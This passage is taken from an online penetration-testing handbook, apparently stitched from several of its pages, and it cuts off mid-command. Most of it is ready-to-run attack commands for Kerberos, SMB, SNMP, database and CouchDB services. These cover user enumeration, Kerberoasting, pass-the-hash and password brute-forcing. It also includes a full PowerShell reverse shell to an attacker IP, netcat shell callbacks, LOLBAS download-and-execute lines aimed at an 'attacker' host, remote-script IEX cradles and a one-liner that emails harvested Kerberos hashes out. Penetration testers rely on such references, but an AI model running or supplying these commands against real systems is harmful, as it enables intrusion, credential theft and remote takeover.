@10.11.1.111 #List users finger admin@10.11.1.111 #Get info of user finger user@10.11.1.111 #Get info of user finger "|/bin/id@example.com" finger "|/bin/ls -a /@example.com" Copy nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN.LOCAL'" IP use auxiliary/gather/kerberos_enumusers # MSF # Check for Kerberoasting: GetNPUsers.py DOMAIN-Target/ -usersfile user.txt -dc-ip -format hashcat/john # GetUserSPNs ASREPRoast: impacket-GetUserSPNs /: -request -format -outputfile impacket-GetUserSPNs / -usersfile -format -outputfile # Kerberoasting: impacket-GetUserSPNs /: -outputfile # Overpass The Hash/Pass The Key (PTK): python3 getTGT.py / -hashes [lm_hash]: python3 getTGT.py / -aesKey python3 getTGT.py /:[password] # Using TGT key to excute remote commands from the following impacket scripts: python3 psexec.py /@ -k -no-pass python3 smbexec.py /@ -k -no-pass python3 wmiexec.py /@ -k -no-pass # https://www.tarlogic.com/blog/como-funciona-kerberos/ # https://www.tarlogic.com/blog/como-atacar-kerberos/ python kerbrute.py -dc-ip IP -users /root/htb/kb_users.txt -passwords /root/pass_common_plus.txt -threads 20 -domain DOMAIN -outputfile kb_extracted_passwords.txt # https://blog.stealthbits.com/extracting-service-account-passwords-with-kerberoasting/ # https://github.com/GhostPack/Rubeus # https://github.com/fireeye/SSSDKCMExtractor # https://gitlab.com/Zer1t0/cerbero Copy telnet 10.11.1.111 USER pelle@10.11.1.111 PASS admin # or: USER pelle PASS admin # List all emails list # Retrieve email number 5, for example retr 9 Copy rpcinfo -p 10.11.1.111 rpcclient -U "" 10.11.1.111 srvinfo enumdomusers getdompwinfo querydominfo netshareenum netshareenumall Copy nmap 10.11.1.111 --script=msrpc-enum msf > use exploit/windows/dcerpc/ms03_026_dcom # Endpoint Mapper Service Discovery use auxiliary/scanner/dcerpc/endpoint_mapper #Hidden DCERPC Service Discovery use auxiliary/scanner/dcerpc/hidden # Remote Management Interface Discovery use auxiliary/scanner/dcerpc/management # DCERPC TCP Service Auditor use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor impacket-rpcdump # Enum network interface # https://github.com/mubix/IOXIDResolver Copy # Enum hostname enum4linux -n 10.11.1.111 nmblookup -A 10.11.1.111 nmap --script=smb-enum* --script-args=unsafe=1 -T5 10.11.1.111 # Get Version smbver.sh 10.11.1.111 Msfconsole;use scanner/smb/smb_version ngrep -i -d tap0 's.?a.?m.?b.?a.*[[:digit:]]' smbclient -L \\\\10.11.1.111 # Get Shares smbmap -H 10.11.1.111 -R echo exit | smbclient -L \\\\10.11.1.111 smbclient \\\\10.11.1.111\\ smbclient -L //10.11.1.111 -N nmap --script smb-enum-shares -p139,445 -T4 -Pn 10.11.1.111 smbclient -L \\\\10.11.1.111\\ # If got error "protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED" smbclient -L //10.11.1.111/ --option='client min protocol=NT1' # Check null sessions smbmap -H 10.11.1.111 rpcclient -U "" -N 10.11.1.111 smbclient //10.11.1.111/IPC$ -N # Exploit null sessions enum -s 10.11.1.111 enum -U 10.11.1.111 enum -P 10.11.1.111 enum4linux -a 10.11.1.111 #https://github.com/cddmp/enum4linux-ng/ enum4linux-ng.py 10.11.1.111 -A -C /usr/share/doc/python3-impacket/examples/samrdump.py 10.11.1.111 # Connect to username shares smbclient //10.11.1.111/share -U username # Connect to share anonymously smbclient \\\\10.11.1.111\\ smbclient //10.11.1.111/ smbclient //10.11.1.111/ smbclient //10.11.1.111/<""share name""> rpcclient -U " " 10.11.1.111 rpcclient -U " " -N 10.11.1.111 # Check vulns nmap --script smb-vuln* -p139,445 -T4 -Pn 10.11.1.111 # Multi exploits msfconsole; use exploit/multi/samba/usermap_script; set lhost 192.168.0.X; set rhost 10.11.1.111; run # Bruteforce login medusa -h 10.11.1.111 -u userhere -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -M smbnt nmap -p445 --script smb-brute --script-args userdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt 10.11.1.111 -vvvv nmap –script smb-brute 10.11.1.111 # nmap smb enum & vuln nmap --script smb-enum-*,smb-vuln-*,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-protocols -p 139,445 10.11.1.111 nmap --script smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse -p 139,445 10.11.1.111 # Mount smb volume linux mount -t cifs -o username=user,password=password //x.x.x.x/share /mnt/share # rpcclient commands rpcclient -U "" 10.11.1.111 srvinfo enumdomusers getdompwinfo querydominfo netshareenum netshareenumall # Run cmd over smb from linux winexe -U username //10.11.1.111 "cmd.exe" --system # smbmap smbmap.py -H 10.11.1.111 -u administrator -p asdf1234 #Enum smbmap.py -u username -p 'P@$$w0rd1234!' -d DOMAINNAME -x 'net group "Domain Admins" /domain' -H 10.11.1.111 #RCE smbmap.py -H 10.11.1.111 -u username -p 'P@$$w0rd1234!' -L # Drive Listing smbmap.py -u username -p 'P@$$w0rd1234!' -d ABC -H 10.11.1.111 -x 'powershell -command "function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=""""192.168.0.X""""; $port=""""4445"""";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize ;$p=New-Object System.Diagnostics.Process ;$p.StartInfo.FileName=""""cmd.exe"""" ;$p.StartInfo.RedirectStandardInput=1 ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0 ;$p.Start() ;$is=$p.StandardInput ;$os=$p.StandardOutput ;Start-Sleep 1 ;$e=new-object System.Text.AsciiEncoding ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length) ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {cleanup} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}} if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else { $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out="""" """"}} $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};"' # Reverse Shell # Check \Policies\{REG}\MACHINE\Preferences\Groups\Groups.xml look for user&pass "gpp-decrypt " # CrackMapExec crackmapexec smb 10.55.100.0/23 -u LA-ITAdmin -H 573f6308519b3df23d9ae2137f549b15 --local crackmapexec smb 10.55.100.0/23 -u LA-ITAdmin -H 573f6308519b3df23d9ae2137f549b15 --local --lsa # Impacket python3 samdump.py SMB 172.21.0.0 # Check for systems with SMB Signing not enabled python3 RunFinger.py -i 172.21.0.0/24 Copy nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes 10.11.1.111 nmap 10.11.1.111 -Pn -sU -p 161 --script=snmp-brute,snmp-hh3c-logins,snmp-info,snmp-interfaces,snmp-ios-config,snmp-netstat,snmp-processes,snmp-sysdescr,snmp-win32-services,snmp-win32-shares,snmp-win32-software,snmp-win32-users snmp-check 10.11.1.111 -c public|private|community snmpwalk -c public -v1 ipaddress 1 snmpwalk -c private -v1 ipaddress 1 snmpwalk -c manager -v1 ipaddress 1 onesixtyone -c /usr/share/doc/onesixtyone/dict.txt 172.21.0.X # Impacket python3 samdump.py SNMP 172.21.0.0 # MSF aux modules auxiliary/scanner/misc/oki_scanner auxiliary/scanner/snmp/aix_version auxiliary/scanner/snmp/arris_dg950 auxiliary/scanner/snmp/brocade_enumhash auxiliary/scanner/snmp/cisco_config_tftp auxiliary/scanner/snmp/cisco_upload_file auxiliary/scanner/snmp/cnpilot_r_snmp_loot auxiliary/scanner/snmp/epmp1000_snmp_loot auxiliary/scanner/snmp/netopia_enum auxiliary/scanner/snmp/sbg6580_enum auxiliary/scanner/snmp/snmp_enum auxiliary/scanner/snmp/snmp_enum_hp_laserjet auxiliary/scanner/snmp/snmp_enumshares auxiliary/scanner/snmp/snmp_enumusers auxiliary/scanner/snmp/snmp_login Copy jxplorer ldapsearch -h 10.11.1.111 -p 389 -x -b "dc=mywebsite,dc=com" python3 windapsearch.py --dc-ip 10.10.10.182 --users --full > windapsearch_users.txt cat windapsearch_users.txt | grep sAMAccountName | cut -d " " -f 2 > users.txt # Check # https://github.com/ropnop/go-windapsearch Copy ./testssl.sh -e -E -f -p -S -P -c -H -U TARGET-HOST > OUTPUT-FILE.html # Check for mod_ssl,OpenSSL version Openfuck Copy ike-scan 10.11.1.111 Copy apt install rsh-client rlogin -l root 10.11.1.111 Copy nmap -p 1433 -sU --script=ms-sql-info.nse 10.11.1.111 use auxiliary/scanner/mssql/mssql_ping use auxiliary/scanner/mssql/mssql_login use exploit/windows/mssql/mssql_payload sqsh -S 10.11.1.111 -U sa xp_cmdshell 'date' go EXEC sp_execute_external_script @language = N'Python', @script = N'import os;os.system("whoami")' https://blog.netspi.com/hacking-sql-server-procedures-part-4-enumerating-domain-accounts/ Copy oscanner -s 10.11.1.111 -P 1521 tnscmd10g version -h 10.11.1.111 tnscmd10g status -h 10.11.1.111 nmap -p 1521 -A 10.11.1.111 nmap -p 1521 --script=oracle-tns-version,oracle-sid-brute,oracle-brute MSF: good modules under auxiliary/admin/oracle and scanner/oracle # https://github.com/quentinhardy/odat ./odat-libc2.5-i686 all -s 10.11.1.111 -p 1521 ./odat-libc2.5-i686 sidguesser -s 10.11.1.111 -p 1521 ./odat-libc2.5-i686 passwordguesser -s 10.11.1.111 -p 1521 -d XE # Upload reverse shell with ODAT: ./odat-libc2.5-i686 utlfile -s 10.11.1.111 -p 1521 -U scott -P tiger -d XE --sysdba --putFile c:/ shell.exe /root/shell.exe # and run it: ./odat-libc2.5-i686 externaltable -s 10.11.1.111 -p 1521 -U scott -P tiger -d XE --sysdba --exec c:/ shell.exe Copy # cisco-audit-tool CAT -h ip -p 2000 -w /usr/share/wordlists/rockyou.txt # cisco-smart-install https://github.com/Sab0tag3d/SIET/ sudo python siet.py -g -i 192.168.0.1 Copy nmap -p 111,2049 --script nfs-ls,nfs-showmount showmount -e 10.11.1.111 # If you find anything you can mount it like this: mount 10.11.1.111:/ /tmp/NFS –o nolock mount -t nfs 10.11.1.111:/ /tmp/NFS –o nolock Copy nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse 10.11.1.111 -p 3306 mysql --host=10.11.1.111 -u root -p # MYSQL UDF 4.x/5.0 https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux/ Copy nmap -p 3389 --script=rdp-vuln-ms12-020.nse rdesktop -u username -p password -g 85% -r disk:share=/root/ 10.11.1.111 rdesktop -u guest -p guest 10.11.1.111 -g 94% ncrack -vv --user Administrator -P /root/oscp/passwords.txt rdp://10.11.1.111 python crowbar.py -b rdp -s 10.11.1.111/32 -u admin -C ../rockyou.txt -v Copy psql -h 10.10.1.111 -U postgres -W # Default creds postgres : postgres postgres : password postgres : admin admin : admin admin : password pg_dump --host=10.10.1.111 --username=postgres --password --dbname=template1 --table='users' -f output_pgdump Copy nmap --script=vnc-info,vnc-brute,vnc-title -p 5900 10.11.1.111 Copy curl http://example.com:5984/ curl -X GET http://IP:5984/_all_dbs curl -X GET http://user:password@IP:5984/_all_dbs # CVE-2017-12635 RCE # Create user curl -X PUT ā€˜http://localhost:5984/_users/org.couchdb.user:chenny' — data-binary ā€˜{ ā€œtypeā€: ā€œuserā€, ā€œnameā€: ā€œchennyā€, ā€œrolesā€: [ā€œ_adminā€], ā€œrolesā€: [], ā€œpasswordā€: ā€œpasswordā€ }’ # Dump database curl http://127.0.0.1:5984/passwords/_all_docs?include_docs=true -u chenny:-Xpassword portfwd add -l 80 -r 172.16.0.0 -p 80 # Netcat nc -l -p < port to listen on> 0pivot # Ncat Http Proxy ncat -vv --listen 3128 --proxy-type http # Local Port2Port #Local port 1521 accessible in port 10521 from everywhere ssh -R 0.0.0.0:10521:127.0.0.1:1521 user@10.0.0.1 #Remote port 1521 accessible in port 10521 from everywhere ssh -R 0.0.0.0:10521:10.0.0.1:1521 user@10.0.0.1 # Port2hostnet (proxychains) # Local Port --> Compromised host(SSH) --> Wherever ssh -f -N -D @ # Remote Port Forwarding ssh -N -R 10.10.1.1:4455:127.0.0.1:445 attacker@10.10.1.1 # Socks5 with SSH ssh -N -D 127.0.0.1:8888 admin@10.1.1.1 #SSH Dynamic Port Forwarding ssh -N -D 127.0.0.1:1337 user@remotehost -p 8888 # SSH graphical connection (X) ssh -Y -C @ # <-Y is less secure but faster than -X> # HTTP tunnel # Port forwarding chisel server -p 8080 --host 192.168.2.105 -v chisel client -v http://192.168.2.105:8080 127.0.0.1:33333:10.42.42.2:80 # Reverse remote port forwarding chisel server -p 8888 --host 192.168.2.149 --reverse -v chisel client -v http://192.168.2.149:8888 R:127.0.0.1:44444:10.42.42.2:80 [PreviousmacOS](https://www.pentest-book.com/post-exploitation/macos) [NextWindows](https://www.pentest-book.com/post-exploitation/windows) Last updated 4 years ago Was this helpful? Was this helpful? --- # File transfer | Pentest Book For the complete documentation index, see [llms.txt](https://www.pentest-book.com/llms.txt) . This page is also available as [Markdown](https://www.pentest-book.com/exploitation/file-transfer.md) . [](https://www.pentest-book.com/exploitation/file-transfer#linux) Linux ---------------------------------------------------------------------------- Copy # Web Server # https://github.com/sc0tfree/updog pip3 install updog updog updog -d /another/directory updog -p 1234 updog --password examplePassword123! updog --ssl # Python web server python -m SimpleHTTPServer 8080 # FTP Server twistd -n ftp -p 21 --root /path/ # In victim: curl -T out.txt ftp://10.10.15.229 # TFTP Server # In Kali atftpd --daemon --port 69 /tftp # In reverse Windows tftp -i 10.11.1.111 GET nc.exe nc.exe -e cmd.exe 10.11.1.111 4444 # Example: http://10.11.1.111/addguestbook.php?LANG=../../xampp/apache/logs/access.log%00&cmd=nc.exe%20-e%20cmd.exe%2010.11.0.105%204444 [](https://www.pentest-book.com/exploitation/file-transfer#windows) Windows -------------------------------------------------------------------------------- [PreviousReverse Shells](https://www.pentest-book.com/exploitation/reverse-shells) [NextPrivilege Escalation](https://www.pentest-book.com/exploitation/privilege-escalation) Last updated 5 years ago Was this helpful? * [Linux](https://www.pentest-book.com/exploitation/file-transfer#linux) * [Windows](https://www.pentest-book.com/exploitation/file-transfer#windows) Was this helpful? Copy # Bitsadmin bitsadmin /transfer mydownloadjob /download /priority normal http:///xyz.exe C:\\Users\\%USERNAME%\\AppData\\local\\temp\\xyz.exe # certutil certutil.exe -urlcache -split -f "http://10.11.1.111/Powerless.bat" Powerless.bat # Powershell (New-Object System.Net.WebClient).DownloadFile("http://10.11.1.111/CLSID.list","C:\Users\Public\CLSID.list") invoke-webrequest -Uri http://10.10.14.19:9090/PowerUp.ps1 -OutFile powerup.ps1 # FTP # In reverse shell" echo open 10.11.1.111 > ftp.txt) echo USER anonymous >> ftp.txt echo ftp >> ftp.txt echo bin >> ftp.txt echo GET file >> ftp.txt echo bye >> ftp.txt # Execute ftp -v -n -s:ftp.txt # SMB Server # Attack machine python /usr/share/doc/python-impacket/examples/smbserver.py Lab "/root/labs/public/10.11.1.111" -u usuario -p pass python /usr/share/doc/python3-impacket/examples/smbserver.py Lab "/root/htb/169-resolute/smb" # Or SMB service # http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html vim /etc/samba/smb.conf [global] workgroup = WORKGROUP server string = Samba Server %v netbios name = indishell-lab security = user map to guest = bad user name resolve order = bcast host dns proxy = no bind interfaces only = yes [ica] path = /var/www/html/pub writable = no guest ok = yes guest only = yes read only = yes directory mode = 0555 force user = nobody chmod -R 777 smb_path chown -R nobody:nobody smb_path service smbd restart # Victim machine with reverse shell # Download: copy \\10.11.1.111\Lab\wce.exe . # Upload: copy wtf.jpg \\10.11.1.111\Lab # VBScript # In reverse shell echo strUrl = WScript.Arguments.Item(0) > wget.vbs echo StrFile = WScript.Arguments.Item(1) >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs echo Err.Clear >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs echo http.Open "GET",strURL,False >> wget.vbs echo http.Send >> wget.vbs echo varByteArray = http.ResponseBody >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs echo strData = "" >> wget.vbs echo strBuffer = "" >> wget.vbs echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs echo Next >> wget.vbs echo ts.Close >> wget.vbs # Execute cscript wget.vbs http://10.11.1.111/file.exe file.exe --- # Privilege Escalation | Pentest Book For the complete documentation index, see [llms.txt](https://www.pentest-book.com/llms.txt) . This page is also available as [Markdown](https://www.pentest-book.com/exploitation/privilege-escalation.md) . This page provides an overview of privilege escalation techniques. For detailed platform-specific guides, see: * [Linux Privilege Escalation](https://www.pentest-book.com/post-exploitation/linux) * [Windows Privilege Escalation](https://www.pentest-book.com/post-exploitation/windows) [](https://www.pentest-book.com/exploitation/privilege-escalation#general-methodology) General Methodology --------------------------------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/exploitation/privilege-escalation#id-1.-situational-awareness) 1\. Situational Awareness Copy # Who am I? whoami id hostname # What system is this? uname -a # Linux systeminfo # Windows cat /etc/*release # Linux distro # Network information ip a / ifconfig # Linux ipconfig /all # Windows netstat -antup # Linux netstat -ano # Windows ### [](https://www.pentest-book.com/exploitation/privilege-escalation#id-2.-users-and-groups) 2\. Users & Groups ### [](https://www.pentest-book.com/exploitation/privilege-escalation#id-3.-running-processes-and-services) 3\. Running Processes & Services ### [](https://www.pentest-book.com/exploitation/privilege-escalation#id-4.-installed-software) 4\. Installed Software ### [](https://www.pentest-book.com/exploitation/privilege-escalation#id-5.-scheduled-tasks) 5\. Scheduled Tasks [](https://www.pentest-book.com/exploitation/privilege-escalation#automated-enumeration-tools) Automated Enumeration Tools ------------------------------------------------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/exploitation/privilege-escalation#linux) Linux ### [](https://www.pentest-book.com/exploitation/privilege-escalation#windows) Windows [](https://www.pentest-book.com/exploitation/privilege-escalation#common-privilege-escalation-vectors) Common Privilege Escalation Vectors ----------------------------------------------------------------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/exploitation/privilege-escalation#linux-1) Linux Vector Description Detection SUID/SGID Binaries running with elevated privileges `find / -perm -4000 2>/dev/null` Sudo misconfig Commands allowed without password `sudo -l` Capabilities Special kernel privileges `getcap -r / 2>/dev/null` Writable files Config files, scripts `find / -writable 2>/dev/null` Cron jobs Scheduled tasks with issues `cat /etc/crontab` Kernel exploits Unpatched kernel `uname -a` NFS no\_root\_squash Mountable shares `cat /etc/exports` Docker group Container escape `id | grep docker` ### [](https://www.pentest-book.com/exploitation/privilege-escalation#windows-1) Windows Vector Description Detection Unquoted service paths Service path without quotes `wmic service get name,pathname` Weak service permissions Modifiable service binaries `accesschk.exe /accepteula -uwcqv *` AlwaysInstallElevated MSI runs as SYSTEM Registry check Stored credentials Cached passwords `cmdkey /list` DLL hijacking Missing DLLs in PATH Process Monitor Token impersonation Potato attacks `whoami /priv` Unpatched vulnerabilities Missing KB `systeminfo` [](https://www.pentest-book.com/exploitation/privilege-escalation#quick-reference) Quick Reference ------------------------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/exploitation/privilege-escalation#gtfobins-linux) GTFOBins (Linux) ### [](https://www.pentest-book.com/exploitation/privilege-escalation#lolbas-windows) LOLBAS (Windows) [](https://www.pentest-book.com/exploitation/privilege-escalation#resources) Resources ------------------------------------------------------------------------------------------- * [HackTricks - Linux Privilege Escalation](https://book.hacktricks.xyz/linux-hardening/privilege-escalation) * [HackTricks - Windows Privilege Escalation](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation) * [PayloadsAllTheThings - Linux Privesc](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md) * [PayloadsAllTheThings - Windows Privesc](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md) * [Absolomb's Security Blog - Windows Privilege Escalation Guide](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/) [PreviousFile transfer](https://www.pentest-book.com/exploitation/file-transfer) [NextBuffer Overflow](https://www.pentest-book.com/exploitation/buffer-overflow) Last updated 5 months ago Was this helpful? * [General Methodology](https://www.pentest-book.com/exploitation/privilege-escalation#general-methodology) * [1\. Situational Awareness](https://www.pentest-book.com/exploitation/privilege-escalation#id-1.-situational-awareness) * [2\. Users & Groups](https://www.pentest-book.com/exploitation/privilege-escalation#id-2.-users-and-groups) * [3\. Running Processes & Services](https://www.pentest-book.com/exploitation/privilege-escalation#id-3.-running-processes-and-services) * [4\. Installed Software](https://www.pentest-book.com/exploitation/privilege-escalation#id-4.-installed-software) * [5\. Scheduled Tasks](https://www.pentest-book.com/exploitation/privilege-escalation#id-5.-scheduled-tasks) * [Automated Enumeration Tools](https://www.pentest-book.com/exploitation/privilege-escalation#automated-enumeration-tools) * [Linux](https://www.pentest-book.com/exploitation/privilege-escalation#linux) * [Windows](https://www.pentest-book.com/exploitation/privilege-escalation#windows) * [Common Privilege Escalation Vectors](https://www.pentest-book.com/exploitation/privilege-escalation#common-privilege-escalation-vectors) * [Linux](https://www.pentest-book.com/exploitation/privilege-escalation#linux-1) * [Windows](https://www.pentest-book.com/exploitation/privilege-escalation#windows-1) * [Quick Reference](https://www.pentest-book.com/exploitation/privilege-escalation#quick-reference) * [GTFOBins (Linux)](https://www.pentest-book.com/exploitation/privilege-escalation#gtfobins-linux) * [LOLBAS (Windows)](https://www.pentest-book.com/exploitation/privilege-escalation#lolbas-windows) * [Resources](https://www.pentest-book.com/exploitation/privilege-escalation#resources) Was this helpful? Copy # Linux cat /etc/passwd cat /etc/group cat /etc/shadow # If readable who w last # Windows net user net localgroup net localgroup Administrators whoami /priv whoami /groups Copy # Linux ps aux ps -ef top cat /etc/services # Windows tasklist /v wmic process list full sc query net start Copy # Linux dpkg -l # Debian rpm -qa # RHEL pip list which python perl ruby gcc nc wget curl # Windows wmic product get name,version reg query HKLM\SOFTWARE dir "C:\Program Files" dir "C:\Program Files (x86)" Copy # Linux crontab -l ls -la /etc/cron* cat /etc/crontab systemctl list-timers # Windows schtasks /query /fo LIST /v dir C:\Windows\Tasks Copy # LinPEAS - Most comprehensive curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh # LinEnum wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh chmod +x LinEnum.sh && ./LinEnum.sh -t # Linux Exploit Suggester wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh chmod +x linux-exploit-suggester.sh && ./linux-exploit-suggester.sh # pspy - Monitor processes wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64 chmod +x pspy64 && ./pspy64 Copy # WinPEAS # https://github.com/carlospolop/PEASS-ng/releases .\winPEASany.exe # PowerUp # https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1 Import-Module .\PowerUp.ps1 Invoke-AllChecks # Seatbelt # https://github.com/GhostPack/Seatbelt .\Seatbelt.exe -group=all # SharpUp # https://github.com/GhostPack/SharpUp .\SharpUp.exe Copy # https://gtfobins.github.io/ # SUID exploitation examples # Python python -c 'import os; os.execl("/bin/sh", "sh", "-p")' # Find find . -exec /bin/sh -p \; -quit # Vim vim -c ':py import os; os.execl("/bin/sh", "sh", "-p")' # Bash /bin/bash -p Copy # https://lolbas-project.github.io/ # Living Off The Land Binaries # certutil - Download files certutil -urlcache -f http://attacker/file.exe file.exe # mshta - Execute HTA mshta http://attacker/evil.hta # rundll32 - Execute DLL rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";document.write();h=new%20ActiveXObject("WScript.Shell").Run("powershell -ep bypass -c IEX(cmd)") --- # PS tips & tricks | Pentest Book For the complete documentation index, see [llms.txt](https://www.pentest-book.com/llms.txt) . This page is also available as [Markdown](https://www.pentest-book.com/post-exploitation/windows/ps-tips-and-tricks.md) . [](https://www.pentest-book.com/post-exploitation/windows/ps-tips-and-tricks#ps-onliners) PS onliners ---------------------------------------------------------------------------------------------------------- Copy # Send email powershell -ep bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1') ; Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt" ; $emailSmtpServer = "smtp.gmail.com" ; $emailSmtpServerPort = "587" ; $emailSmtpUser = "Add-Your-Gmail-Email-Address" ; $emailSmtpPass = "Add-Your-Gmail-Password" ; $emailMessage = New-Object System.Net.Mail.MailMessage; $emailMessage.From = "Add-Your-Gmail-Email-Address" ; $emailMessage.To.Add( "Add-Your-Gmail-Email-Address" ) ; $emailMessage.Subject = "Testing e-mail" ; $emailMessage.IsBodyHtml = $true; $emailMessage.Body = "test" ; $SMTPClient = New-Object System.Net.Mail.SmtpClient( $emailSmtpServer , $emailSmtpServerPort ); $SMTPClient.EnableSsl = $true ; $SMTPClient.Credentials = New-Object System.Net.NetworkCredential( $emailSmtpUser , $emailSmtpPass ); ; $attachment = "kerb-Hash0.txt" ; $emailMessage.Attachments.Add( $attachment ) ; $SMTPClient.Send( $emailMessage ) # Who's connected to DC powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/darkoperator/Veil-PowerView/master/PowerView/functions/Get-NetSessions.ps1'); Get-NetSessions -HostName WIN-O9LVH0D7KUN" # List users in specified group powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/240711712e014f90b9e7d4f7e97f44c36cac65cf/powerview.ps1');Get-NetLocalGroup -HostName LAB22.server1.hacklab.local" # User's groups powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Get-NetGroup -UserName user1" # PTH powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/master/Invoke-SMBExec.ps1');Invoke-SMBExec -Target 192.168.1.11 -Domain WORKGROUP -Username IEUser -Hash fc525c9683e8fe067095ba2ddc971889 -Command 'net user SMBExec Winter2017 /add'" # See who's local admin powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1'); Get-NetLocalGroup -ComputerName WIN-O9LVH0D7KUN" # Get DC names powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1'); Get-NetDomainController" # List all machines names powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1'); Get-NetComputer -FullData | Get-NameField" # What's copied in clipboard powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/collection/Get-ClipboardContents.ps1');Get-ClipboardContents" # Check if you're local admin in any remote machine powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Find-LocalAdminAccess" # Run BH powershell.exe ā€œIEX (New-Object Net.WebClient).DownloadString(ā€˜https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1’); Get-BloodHoundDataā€ # Run mimikatz powershell -nop -exec 